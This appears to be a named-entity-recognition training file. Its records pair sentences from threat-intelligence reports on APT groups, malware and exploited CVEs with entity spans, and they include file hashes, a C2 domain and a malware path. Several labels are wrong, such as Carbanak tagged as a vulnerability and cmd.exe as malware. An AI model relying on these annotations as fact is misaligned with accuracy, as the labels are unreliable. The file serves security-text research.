{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[0, 14], [54, 68]], "ORGANIZATION: maritime-related": [[94, 110]], "ORGANIZATION: engineering firms": [[157, 174]], "ORGANIZATION: shipping": [[177, 185]], "ORGANIZATION: transportation": [[190, 204]], "ORGANIZATION: manufacturing": [[207, 220]], "ORGANIZATION: defense": [[223, 230]], "ORGANIZATION: government": [[233, 243]], "ORGANIZATION: research universities": [[258, 279]], "ORGANIZATION: bank": [[314, 318]], "ORGANIZATION: Kessem": [[354, 360]]}, "info": {"id": "cyberner_stix_train_002470", "source": "cyberner_stix_train"}}
{"text": "] 205 [ . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . The script will take an embedded PE file that has been base64 encoded and inject that into the current PowerShell process . Mandiant identified UNC4899 targeting MacOS keychains and reconnaissance data associated with executives and internal security teams .", "spans": {"VULNERABILITY: CVE-2013-0640": [[74, 87]], "TOOL: MiniDuke": [[98, 106]], "VULNERABILITY: zero-day": [[160, 168]], "THREAT_ACTOR: group": [[190, 195]], "TOOL: PE": [[252, 254]], "TOOL: PowerShell": [[322, 332]], "ORGANIZATION: MacOS keychains": [[381, 396]], "ORGANIZATION: reconnaissance data associated with executives and internal security teams": [[401, 475]]}, "info": {"id": "cyberner_stix_train_002471", "source": "cyberner_stix_train"}}
{"text": "Cannon takes a screenshot and saves it to a file named ops .", "spans": {"MALWARE: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_train_002472", "source": "cyberner_stix_train"}}
{"text": "Highlights Samples of the malicious code found in BrainTest have been found on Google Play , and its creator has used multiple methods to evade detection by Google including Bypassing Google Bouncer by detecting if the malware is being run from an IP or domain mapped to Google Bouncer and , if so , it will not perform its intended malicious activities . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots .", "spans": {"MALWARE: BrainTest": [[50, 59]], "SYSTEM: Google Play": [[79, 90]], "ORGANIZATION: Google": [[157, 163]], "SYSTEM: Google Bouncer": [[184, 198], [271, 285]], "VULNERABILITY: Carbanak": [[376, 384]], "THREAT_ACTOR: criminals": [[451, 460]], "ORGANIZATION: financial industry": [[501, 519]], "ORGANIZATION: customers": [[543, 552]], "THREAT_ACTOR: APT10": [[555, 560]], "MALWARE: scheduled tasks": [[616, 631]], "MALWARE: Windows services": [[635, 651]]}, "info": {"id": "cyberner_stix_train_002473", "source": "cyberner_stix_train"}}
{"text": "The Sofacy group continues their targeted attack campaigns in 2018 .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_002474", "source": "cyberner_stix_train"}}
{"text": "The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: EternalBlue exploit": [[168, 187]], "THREAT_ACTOR: WannaCry": [[200, 208]], "MALWARE: Carbanak": [[232, 240]], "ORGANIZATION: consumer": [[308, 316]], "MALWARE: Carberp": [[408, 415]]}, "info": {"id": "cyberner_stix_train_002475", "source": "cyberner_stix_train"}}
{"text": "Snake Wine was first publicly disclosed by FireEye in this report . In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document .", "spans": {"ORGANIZATION: FireEye": [[43, 50]], "TOOL: e-mail": [[107, 113]], "TOOL: Scarlet Mimic": [[171, 184]], "VULNERABILITY: exploit": [[185, 192]]}, "info": {"id": "cyberner_stix_train_002476", "source": "cyberner_stix_train"}}
{"text": "These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[137, 149]]}, "info": {"id": "cyberner_stix_train_002477", "source": "cyberner_stix_train"}}
{"text": "These campaigns are specifically directed at entities and individuals in the Palestinian territories .", "spans": {}, "info": {"id": "cyberner_stix_train_002478", "source": "cyberner_stix_train"}}
{"text": "The initial sample we intercepted was a Microsoft Word document ( SHA256 : 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f ) with the filename crash list ( Lion Air Boeing 737 ).docx using the author name Joohn .", "spans": {"ORGANIZATION: Microsoft": [[40, 49]], "TOOL: Word": [[50, 54]], "FILEPATH: 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f": [[75, 139]], "FILEPATH: crash list ( Lion Air Boeing 737 ).docx": [[160, 199]]}, "info": {"id": "cyberner_stix_train_002479", "source": "cyberner_stix_train"}}
{"text": "Whitefly has consistently used a technique known as search order hijacking to run Vcrodat . If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "TOOL: search order hijacking": [[52, 74]], "TOOL: Vcrodat": [[82, 89]], "MALWARE: PingCastle MS17-010": [[163, 182]], "VULNERABILITY: EternalBlue": [[310, 321]]}, "info": {"id": "cyberner_stix_train_002480", "source": "cyberner_stix_train"}}
{"text": "Such an action can be performed at any moment , regardless of the current application or user location in that application . We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective , publicly-available RAT to its arsenal . In late June 2018 , Unit 42 revealed a previously unknown cyber espionage group we dubbed Rancor , which conducted targeted attacks in Southeast Asia E-LOC throughout 2017 and 2018 . The session takeovers bypassed password and multi - factor authentication .", "spans": {"TOOL: PIVY": [[154, 158]], "THREAT_ACTOR: threat actors": [[232, 245]], "TOOL: RAT": [[343, 346]], "ORGANIZATION: Unit 42": [[384, 391]], "THREAT_ACTOR: Rancor": [[454, 460]]}, "info": {"id": "cyberner_stix_train_002481", "source": "cyberner_stix_train"}}
{"text": "Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": {"MALWARE: More_eggs malware": [[31, 48]], "MALWARE: cmd.exe": [[132, 139]], "ORGANIZATION: development company": [[295, 314]], "FILEPATH: CONFUCIUS_A": [[329, 340]], "FILEPATH: CONFUCIUS_B": [[345, 356]]}, "info": {"id": "cyberner_stix_train_002482", "source": "cyberner_stix_train"}}
{"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies .", "spans": {"MALWARE: malicious.DOC": [[86, 99]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[119, 158]], "VULNERABILITY: CVE-2012-0158": [[161, 174]], "ORGANIZATION: Kaspersky Security Network": [[283, 309]], "ORGANIZATION: KSN": [[312, 315]], "ORGANIZATION: gaming companies": [[368, 384]]}, "info": {"id": "cyberner_stix_train_002483", "source": "cyberner_stix_train"}}
{"text": "MainService is the brain of this spyware and controls almost everything—from stealing the victim 's data to deleting it . SPEAR has observed numerous different XOR keys utilized by Ghost Dragon . Before acting on the request , Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking .", "spans": {"THREAT_ACTOR: Ghost Dragon": [[181, 193]], "MALWARE: Winnti": [[227, 233]], "TOOL: DWORD": [[258, 263]]}, "info": {"id": "cyberner_stix_train_002484", "source": "cyberner_stix_train"}}
{"text": "Threat groups outside of China are unlikely to target the Uyghur people .", "spans": {}, "info": {"id": "cyberner_stix_train_002485", "source": "cyberner_stix_train"}}
{"text": "A company representative declined to comment for this post . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations . LaZagne ( SecurityRisk.LaZagne ) : A login/password retrieval tool . Talos provided a highly informative article on the PREDATOR commercial spyware , which has been around since 2019 .", "spans": {"THREAT_ACTOR: Lazarus": [[105, 112]], "ORGANIZATION: Bitcoin users": [[190, 203]], "ORGANIZATION: financial organizations": [[215, 238]], "MALWARE: LaZagne": [[241, 248]], "MALWARE: SecurityRisk.LaZagne": [[251, 271]], "ORGANIZATION: Talos": [[310, 315]], "MALWARE: PREDATOR": [[361, 369]]}, "info": {"id": "cyberner_stix_train_002486", "source": "cyberner_stix_train"}}
{"text": "Notice notice the use of the mistaken “ Word ” instead of “ World ” : “ On behalf of all at the Word Uyghur Congress ( WUC ) , the Unrepresented Nations and Peoples Organization ( UNPO ) and the Society for Threatened Peoples ( STP ) , Human Rights in China : Implications for East Turkestan , Tibet and Southern Mongolia In what was an unprecedented coming-together of leading Uyghur , Mongolian , Tibetan and Chinese activists , as well as other leading international experts , we were greatly humbled In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT .", "spans": {"ORGANIZATION: Word Uyghur Congress ( WUC )": [[96, 124]], "ORGANIZATION: Unrepresented Nations and Peoples Organization ( UNPO )": [[131, 186]], "ORGANIZATION: Society for Threatened Peoples ( STP )": [[195, 233]], "THREAT_ACTOR: activity groups": [[543, 558]], "THREAT_ACTOR: PROMETHIUM": [[561, 571]], "THREAT_ACTOR: NEODYMIUM": [[576, 585]], "VULNERABILITY: zeroday exploit": [[644, 659]], "THREAT_ACTOR: Naikon APT": [[794, 804]]}, "info": {"id": "cyberner_stix_train_002487", "source": "cyberner_stix_train"}}
{"text": "The core malware extracts the device ’ s installed app list . The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event . Dexphot then used fileless techniques to run malicious code directly in memory , leaving only a few traces that can be used for forensics . APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations .", "spans": {"ORGANIZATION: media": [[150, 155]], "MALWARE: Dexphot": [[269, 276]], "THREAT_ACTOR: APT29": [[409, 414]]}, "info": {"id": "cyberner_stix_train_002488", "source": "cyberner_stix_train"}}
{"text": "The raw wave audio buffer frame can be dumped in the getNextBuffer ( ) function . Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 . the v3 and v7 variables are assigned to the block comparison variable ( b_cmp ) Function has a couple of Anti debugging Anti Emulation checks .", "spans": {"THREAT_ACTOR: Charming Kitten": [[82, 97]], "THREAT_ACTOR: cyberespionage group": [[112, 132]], "TOOL: Anti debugging": [[275, 289]], "TOOL: Anti Emulation checks": [[290, 311]]}, "info": {"id": "cyberner_stix_train_002489", "source": "cyberner_stix_train"}}
{"text": "To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . In 2016 , CTU researchers observed the group using native system .", "spans": {"THREAT_ACTOR: Lazarus": [[37, 44]], "ORGANIZATION: banks'": [[69, 75]], "ORGANIZATION: CTU": [[170, 173]]}, "info": {"id": "cyberner_stix_train_002490", "source": "cyberner_stix_train"}}
{"text": "'' Strazzere says he also failed to reach MediaTek , a Taiwanese fabless semiconductor manufacturer whose chipsets that powered BLU phones also contained Adups software . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . C2 : lywjrea.gmarketshop.net .", "spans": {"ORGANIZATION: MediaTek": [[42, 50]], "ORGANIZATION: BLU": [[128, 131]], "ORGANIZATION: Adups": [[154, 159]], "VULNERABILITY: CVE-2018-0798": [[171, 184]], "THREAT_ACTOR: threat actor": [[262, 274]], "TOOL: C2": [[305, 307]], "DOMAIN: lywjrea.gmarketshop.net": [[310, 333]]}, "info": {"id": "cyberner_stix_train_002491", "source": "cyberner_stix_train"}}
{"text": "Our analysis shows the DEFENSOR ID trojan can execute 17 commands received from the attacker-controlled server such as uninstalling an app , launching an app and then performing any click/tap action controlled remotely by the attacker ( see Figure 5 ) . On June 17 , we observed the campaign’s spam emails delivering malware-embedded Excel files directly as an attachment . McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": {"MALWARE: DEFENSOR ID": [[23, 34]], "ORGANIZATION: McAfee Advanced Threat Research": [[374, 405]], "ORGANIZATION: ATR": [[408, 411]], "THREAT_ACTOR: Lazarus": [[526, 533]], "MALWARE: sophisticated": [[544, 557]], "MALWARE: malware": [[558, 565]]}, "info": {"id": "cyberner_stix_train_002492", "source": "cyberner_stix_train"}}
{"text": "After installing this AntSword webshell , the actor no longer uses the Awen webshell and issues the first command to AntSword 35 seconds after the last command issued to the Awen webshell .", "spans": {"TOOL: AntSword": [[22, 30], [117, 125]], "TOOL: Awen": [[71, 75], [174, 178]]}, "info": {"id": "cyberner_stix_train_002493", "source": "cyberner_stix_train"}}
{"text": "zygotedaemoni686 2019-01-08 04:55:00 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 sapp.apk 2019-01-08 04:53:00 4bf1446c412dd5c552539490d03e999a6ceb96ae60a9e7846427612bec316619 placeholder 2018-03-29 16:31:00 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications . JhoneRAT : 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 . Adversaries may perform data destruction over the course of an operation .", "spans": {"ORGANIZATION: Unit 42": [[317, 324]], "ORGANIZATION: government": [[375, 385]], "TOOL: BONDUPDATER malware": [[423, 442]], "TOOL: DNS tunneling": [[506, 519]], "MALWARE: JhoneRAT": [[557, 565]], "FILEPATH: 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091": [[568, 632]]}, "info": {"id": "cyberner_stix_train_002494", "source": "cyberner_stix_train"}}
{"text": "Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": {"ORGANIZATION: Unit 42": [[70, 77]], "THREAT_ACTOR: group": [[134, 139]], "THREAT_ACTOR: groups": [[162, 168]], "ORGANIZATION: minority groups": [[223, 238]], "THREAT_ACTOR: APT39": [[285, 290]], "ORGANIZATION: telecommunications and travel industries": [[307, 347]], "ORGANIZATION: specific individuals": [[434, 454]]}, "info": {"id": "cyberner_stix_train_002495", "source": "cyberner_stix_train"}}
{"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month .", "spans": {"MALWARE: bait document": [[5, 18]], "MALWARE: Word document": [[68, 81]], "VULNERABILITY: CVE-2012-0158": [[102, 115]], "ORGANIZATION: ClearSky": [[286, 294]], "FILEPATH: WinRAR": [[377, 383]]}, "info": {"id": "cyberner_stix_train_002496", "source": "cyberner_stix_train"}}
{"text": "To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"TOOL: Remote Desktop Protocol": [[57, 80]], "TOOL: RDP": [[83, 86]], "VULNERABILITY: Carbanak": [[91, 99]], "TOOL: flash": [[215, 220]], "VULNERABILITY: exploit": [[221, 228]], "VULNERABILITY: CVE-2016-4117": [[231, 244]]}, "info": {"id": "cyberner_stix_train_002497", "source": "cyberner_stix_train"}}
{"text": "Another option is to simply halt and quarantine the Winnti implant itself , stopping the intrusion on a single machine .", "spans": {"MALWARE: Winnti implant": [[52, 66]]}, "info": {"id": "cyberner_stix_train_002498", "source": "cyberner_stix_train"}}
{"text": "If the user unlocks their device , they will see a black screen while the app drops the call , resets call settings and prepares for the user to interact with the device normally . Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . The rest of the content is a byte for byte copy . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[210, 224]], "ORGANIZATION: engineering firms": [[313, 330]], "ORGANIZATION: shipping": [[333, 341]], "ORGANIZATION: transportation": [[346, 360]], "ORGANIZATION: manufacturing": [[363, 376]], "ORGANIZATION: defense": [[379, 386]], "ORGANIZATION: government offices": [[389, 407]], "ORGANIZATION: research universities": [[414, 435]], "ORGANIZATION: Microsoft": [[573, 582]]}, "info": {"id": "cyberner_stix_train_002499", "source": "cyberner_stix_train"}}
{"text": "The setup code receives an installation command from the previous stage . APT35 has historically used unsophisticated tools like those listed below in Figure 3 . Both values are supplied from an array of 256 pseudo-random bytes hardcoded in the binary’s .rdata section . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": {"THREAT_ACTOR: APT35": [[74, 79]], "TOOL: unsophisticated tools": [[102, 123]]}, "info": {"id": "cyberner_stix_train_002500", "source": "cyberner_stix_train"}}
{"text": "Instances of this spyware were found on the Google Play Store , disguised as service applications from mobile operators . APT34 uses a mix of public and non-public tools ( Fig.2 ) and often uses compromised accounts to conduct spear-phishing operations . The first is responsible for checking if the system has the targeted keyboard layout — this is exclusively in Arabic-speaking countries . Our 2023 Ransomware Report unpacks the action in four zones : the US , Germany , France , and the UK .", "spans": {"SYSTEM: Google Play Store": [[44, 61]], "THREAT_ACTOR: APT34": [[122, 127]], "TOOL: public and non-public tools": [[142, 169]], "TOOL: compromised accounts": [[195, 215]], "MALWARE: Ransomware": [[402, 412]]}, "info": {"id": "cyberner_stix_train_002501", "source": "cyberner_stix_train"}}
{"text": "In this case Attackers again spoofed an email id associated with Indian Ministry of Home Affairs and the mail was sent on September 1,2016 to an email id associated Thailand Indian embassy , this email was later forwarded on Oct 24th,2016 from a spoofed email of Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs ( MEA ) .", "spans": {"TOOL: email": [[40, 45], [145, 150], [196, 201], [254, 259], [298, 303]], "ORGANIZATION: Indian Ministry of Home Affairs": [[65, 96]], "ORGANIZATION: Indian embassy": [[174, 188], [272, 286]], "ORGANIZATION: Indian Ministry of External Affairs": [[332, 367]], "ORGANIZATION: MEA": [[370, 373]]}, "info": {"id": "cyberner_stix_train_002502", "source": "cyberner_stix_train"}}
{"text": "cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551 .", "spans": {"FILEPATH: cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551": [[0, 64]]}, "info": {"id": "cyberner_stix_train_002503", "source": "cyberner_stix_train"}}
{"text": "Several other hacker groups have also begun targeting some of the same chemical companies in this time period .", "spans": {}, "info": {"id": "cyberner_stix_train_002504", "source": "cyberner_stix_train"}}
{"text": "This translates to “ The Complete Details of Fuqaha ’s Assassination ”", "spans": {}, "info": {"id": "cyberner_stix_train_002505", "source": "cyberner_stix_train"}}
{"text": "Rotexy will perform further actions after it receives the corresponding commands : START , STOP , RESTART — start , stop , restart SuperService . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign .", "spans": {"MALWARE: Rotexy": [[0, 6]], "MALWARE: ThreeDollars document": [[229, 250]], "ORGANIZATION: CTU": [[351, 354]], "THREAT_ACTOR: NICKEL ACADEMY": [[404, 418]]}, "info": {"id": "cyberner_stix_train_002506", "source": "cyberner_stix_train"}}
{"text": "The top level malware , CE8B99DF8642C065B6AF43FDE1F786A3 ( named by its authors “ msdeltemp.dll ” according to internal strings , and compiled July 28th , 2015 ) is a rare type of the Sofacy AZZY implant .", "spans": {"FILEPATH: CE8B99DF8642C065B6AF43FDE1F786A3": [[24, 56]], "FILEPATH: msdeltemp.dll": [[82, 95]], "THREAT_ACTOR: Sofacy": [[184, 190]], "MALWARE: AZZY": [[191, 195]]}, "info": {"id": "cyberner_stix_train_002507", "source": "cyberner_stix_train"}}
{"text": "The Trojan works by creating an overlay whenever the user launches the banking application . ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza . The discovery of COSMICENERGY illustrates that the barriers to entry for developing offensive OT capabilities are lowering as actors leverage knowledge from prior attacks to develop new malware .", "spans": {"THREAT_ACTOR: ScarCruft": [[93, 102]], "THREAT_ACTOR: APT group": [[123, 132]], "FILEPATH: .pdb": [[308, 312]], "SYSTEM: Windows": [[333, 340]], "MALWARE: COSMICENERGY": [[383, 395]]}, "info": {"id": "cyberner_stix_train_002508", "source": "cyberner_stix_train"}}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "VULNERABILITY: CVE-2018-8414": [[315, 328]], "THREAT_ACTOR: DarkHydrus": [[418, 428]]}, "info": {"id": "cyberner_stix_train_002509", "source": "cyberner_stix_train"}}
{"text": "The creators of the Spark backdoor use a few techniques that are intended to keep the backdoor under-the-radar , including :", "spans": {"MALWARE: Spark backdoor": [[20, 34]]}, "info": {"id": "cyberner_stix_train_002510", "source": "cyberner_stix_train"}}
{"text": "android.intent.action.CONNECTIVITY_CHANGE System notification that a change in network connectivity has occurred , either lost or established . APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies . The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada .", "spans": {"THREAT_ACTOR: APT41": [[144, 149]], "ORGANIZATION: video game industry": [[220, 239]], "THREAT_ACTOR: APT28": [[309, 314]]}, "info": {"id": "cyberner_stix_train_002511", "source": "cyberner_stix_train"}}
{"text": "Cybercriminals also exploit the Master Key vulnerability and have learned to embed unsigned executable files in Android installation packages . If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC . After having been decrypted , ShadowPad ’s shellcode is executed . But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor ’s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as ‘ one of the world ’s most unusual APT operations ’ due to : • Its use of a customized backdoor written in Assembler using ‘ old school ’ virus writing techniques and habits • Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": {"VULNERABILITY: Master Key vulnerability": [[32, 56]], "SYSTEM: Android": [[112, 119]], "MALWARE: ShadowPad": [[349, 358]], "TOOL: shellcode": [[362, 371]], "ORGANIZATION: GReAT": [[458, 463]], "MALWARE: MiniDuke": [[478, 486]], "MALWARE: CosmicDuke": [[489, 499]], "ORGANIZATION: targeting government": [[542, 562]], "ORGANIZATION: diplomatic , energy , military and telecom operators": [[565, 617]]}, "info": {"id": "cyberner_stix_train_002512", "source": "cyberner_stix_train"}}
{"text": "We watched WolfRAT evolve through various iterations which shows that the actor wanted to ensure functional improvements — perhaps they had deadlines to meet for their customers , but with no thought given to removing old code blocks , classes , etc . It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook . These changes may be temporary and FireEye believes they are aimed at decreasing detection of their tools until a more permanent and effective TTP change can be implemented ( e.g. , WATERSPOUT ) . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": {"MALWARE: WolfRAT": [[11, 18]], "TOOL: MoonWind": [[272, 280]], "ORGANIZATION: FireEye": [[490, 497]], "MALWARE: WATERSPOUT": [[637, 647]], "THREAT_ACTOR: threat actors": [[656, 669]], "TOOL: NetSupport RAT": [[687, 701]]}, "info": {"id": "cyberner_stix_train_002513", "source": "cyberner_stix_train"}}
{"text": "HenBox appears to primarily target the Uyghurs – a minority Turkic ethnic group that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in North West China . This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": {"MALWARE: HenBox": [[0, 6]], "MALWARE: ‘Tokyo’": [[249, 256]], "MALWARE: ‘Yokohama’": [[261, 271]], "THREAT_ACTOR: APT actor": [[278, 287]], "ORGANIZATION: financial services": [[355, 373]], "ORGANIZATION: telecoms": [[376, 384]], "ORGANIZATION: government": [[387, 397]], "ORGANIZATION: defense sectors": [[404, 419]]}, "info": {"id": "cyberner_stix_train_002514", "source": "cyberner_stix_train"}}
{"text": "It then loads the contents of the encrypted file and injects it into the explorer.exe and iexplore.exe processes .", "spans": {"FILEPATH: explorer.exe": [[73, 85]], "FILEPATH: iexplore.exe": [[90, 102]]}, "info": {"id": "cyberner_stix_train_002515", "source": "cyberner_stix_train"}}
{"text": "Alpha’s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: Alpha’s": [[0, 7]], "VULNERABILITY: exploit": [[235, 242]], "VULNERABILITY: CVE-2012-0158": [[243, 256]], "MALWARE: NetTraveler Trojan": [[272, 290]]}, "info": {"id": "cyberner_stix_train_002516", "source": "cyberner_stix_train"}}
{"text": "In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection . CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": {"ORGANIZATION: CTU": [[168, 171]], "THREAT_ACTOR: Group-3390": [[209, 219]], "ORGANIZATION: U.S. defense": [[257, 269]], "ORGANIZATION: military capability": [[387, 406]]}, "info": {"id": "cyberner_stix_train_002517", "source": "cyberner_stix_train"}}
{"text": "Upon further inspection , we have observed that this RAT extracts WhatsApp data too . An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . Name SHA256 . If more groups start adopting CL0P 's zero - day exploitation techniques , the ransomware landscape could tilt from service - oriented attacks to a more aggressive , vulnerability - focused model — a move that could skyrocket the impact of attacks .", "spans": {"SYSTEM: WhatsApp": [[66, 74]], "THREAT_ACTOR: APT gang": [[89, 97]], "ORGANIZATION: governments": [[181, 192]], "THREAT_ACTOR: groups": [[307, 313]], "MALWARE: ransomware": [[378, 388]]}, "info": {"id": "cyberner_stix_train_002518", "source": "cyberner_stix_train"}}
{"text": "The domain was registered on March 8th , 2013 : Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. Domain Name : DLMDOCUMENTSEXCHANGE.COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail.com ) beijingshiahiidienquc.d beijingshi beijing,100000 While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": {"ORGANIZATION: SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD.": [[83, 146]], "VULNERABILITY: CVE-2014-0515": [[542, 555]], "VULNERABILITY: Adobe Flash exploit": [[556, 575]], "ORGANIZATION: Cisco TRAC": [[594, 604]], "ORGANIZATION: Kaspersky": [[637, 646]], "VULNERABILITY: zero-day": [[672, 680]], "VULNERABILITY: exploit": [[681, 688]], "THREAT_ACTOR: BlackOasis": [[697, 707]]}, "info": {"id": "cyberner_stix_train_002519", "source": "cyberner_stix_train"}}
{"text": "] com nampriknum [ . In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) . These threat actors ’ tactics follow the same principles of evolution – successful techniques propagate , and unsuccessful ones are abandoned . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": {"ORGANIZATION: Tibetan Parliament": [[105, 123]], "ORGANIZATION: Tibetan government": [[163, 181]], "ORGANIZATION: Central Tibetan Administration": [[211, 241]]}, "info": {"id": "cyberner_stix_train_002520", "source": "cyberner_stix_train"}}
